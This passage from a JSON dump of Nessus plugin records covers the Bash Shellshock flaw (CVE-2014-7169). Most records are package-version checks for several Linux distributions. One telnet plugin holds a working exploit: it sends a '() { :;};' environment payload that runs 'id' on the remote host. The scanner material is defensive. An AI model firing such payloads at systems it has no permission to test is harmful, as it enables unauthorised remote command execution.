preg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:54", "description": "Description of changes:\n\n[3.0-27.0.3]\n- Rework env function definition for safety (Florian Weimer) [CVE-2014-7169]", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : bash (ELSA-2014-3079)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2014-3079.NASL", "href": "https://www.tenable.com/plugins/nessus/77953", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3079.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77953);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 4 : bash (ELSA-2014-3079)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[3.0-27.0.3]\n- Rework env function definition for safety (Florian Weimer) [CVE-2014-7169]\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004493.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"bash-3.0-27.0.3.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:36", "description": "Tavis Ormandy discovered that the security fix for Bash included in USN-2362-1 was incomplete. An attacker could use this issue to bypass certain environment restrictions. 
(CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2363-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bash", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2363-1.NASL", "href": "https://www.tenable.com/plugins/nessus/77897", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2363-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77897);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"USN\", value:\"2363-1\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2363-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"Tavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://usn.ubuntu.com/2363-1/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"bash\", pkgver:\"4.1-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"bash\", pkgver:\"4.2-2ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:46", "description": "USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch for CVE-2014-7169 didn't get properly applied in the Ubuntu 14.04 LTS package. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nTavis Ormandy discovered that the security fix for Bash included in USN-2362-1 was incomplete. 
An attacker could use this issue to bypass certain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : bash vulnerability (USN-2363-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bash", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2363-2.NASL", "href": "https://www.tenable.com/plugins/nessus/77898", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2363-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77898);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"USN\", value:\"2363-2\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Ubuntu 14.04 LTS : bash vulnerability (USN-2363-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"USN-2363-1 fixed a vulnerability in Bash. 
Due to a build issue, the\npatch for CVE-2014-7169 didn't get properly applied in the Ubuntu\n14.04 LTS package. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nTavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://usn.ubuntu.com/2363-2/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. 
/ NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:31", "description": "The remote host is running a version of Bash that is vulnerable to command injection via environment variable manipulation. 
Depending on the configuration of the system, an attacker could remotely execute arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "GNU Bash Local Environment Variable Handling Command Injection via Telnet (CVE-2014-7169) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_REMOTE_CODE_EXECUTION_TELNET.NASL", "href": "https://www.tenable.com/plugins/nessus/77857", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77857);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"GNU Bash Local Environment Variable Handling Command Injection via Telnet (CVE-2014-7169) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A system shell on the remote host is vulnerable to command injection.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. 
Depending on\nthe configuration of the system, an attacker could remotely execute\narbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update Bash.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"telnet.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"telnet2_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"data_protection.inc\");\n\n\nport = get_service(svc:\"telnet\", default:23, exit_on_fail:TRUE);\n\nglobal_var rcvdata;\nglobal_var cnt;\nglobal_var two_output;\n\nfunction local_telnet_callback()\n{\n local_var data, report;\n\n data = _FCT_ANON_ARGS[0];\n\n # Accumulate each byte as it's received.\n if (data && ord(data[0]) != 0x00 && ord(data[0]) != 0x0d) rcvdata += data[0];\n\n if ( 'Plugin output: 2' >< rcvdata && data[0] == '\\n' )\n {\n two_output = rcvdata;\n return -1;\n }\n\n if ( 'uid=' >< rcvdata && data[0] == '\\n' )\n {\n report =\n'It was possible to exploit this vulnerability by sending a malformed\nUSER environment variable to the remote server, which allowed us to\nexecute the \\'id\\' command:\\n' + rcvdata;\n\n security_hole(port:port, extra:report);\n exit(0);\n }\n\n if (\"login: \" >< rcvdata || 'assword:' >< rcvdata )\n exit(0, \"The remote host is running a telnet server that is not configured to run a shell script on connect, and so it is not affected.\");\n}\n\n# Set up the environment.\ntest_command = \"echo Plugin output: $((1+1))\";\nenv_data =\n mkbyte(0) +\n mkbyte(0) + \"USER\" +\n mkbyte(1) + \"() { :;}; \" + test_command;\n\noptions = NULL;\noptions[0] = make_list(OPT_NEW_ENV, env_data);\n\ncnt = 0;\n# Connect and process options.\nif (!telnet2_init(port:port, options:options, timeout:5*get_read_timeout()))\n audit(AUDIT_SVC_FAIL, \"telnet\", port);\n\nrcvdata = NULL;\ntwo_output = NULL;\n\ntelnet_loop(telnet_callback_fn:@local_telnet_callback);\n\n# Set up the environment.\ntest_command = \"/usr/bin/id\";\nenv_data =\n 
mkbyte(0) +\n mkbyte(0) + \"USER\" +\n mkbyte(1) + \"() { :;}; \" + test_command;\n\noptions = NULL;\noptions[0] = make_list(OPT_NEW_ENV, env_data);\n\ncnt = 0;\n# Connect and process options.\nif (!telnet2_init(port:port, options:options, timeout:5*get_read_timeout()))\n audit(AUDIT_SVC_FAIL, \"telnet\", port);\n\nrcvdata = NULL;\ntelnet_loop(telnet_callback_fn:@local_telnet_callback);\n\nif (!isnull(two_output))\n{\n report =\n'It was possible to exploit this vulnerability by sending a malformed\nUSER environment variable to the remote server, which allowed us to\nexecute the \\'echo Plugin output: $((1+1))\\' command:\\n' + data_protection::sanitize_uid(output:two_output);\n\n security_hole(port:port, extra:report);\n exit(0);\n}\n\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:33", "description": "New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bash (SSA:2014-268-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:bash", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2014-268-01.NASL", "href": "https://www.tenable.com/plugins/nessus/77877", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-268-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77877);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_xref(name:\"SSA\", value:\"2014-268-01\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bash (SSA:2014-268-01)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"New bash packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix a security issue.\");\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.495008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?663404aa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"i486\", pkgnum:\"2_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"i486\", pkgnum:\"2_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"i486\", pkgnum:\"2_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", 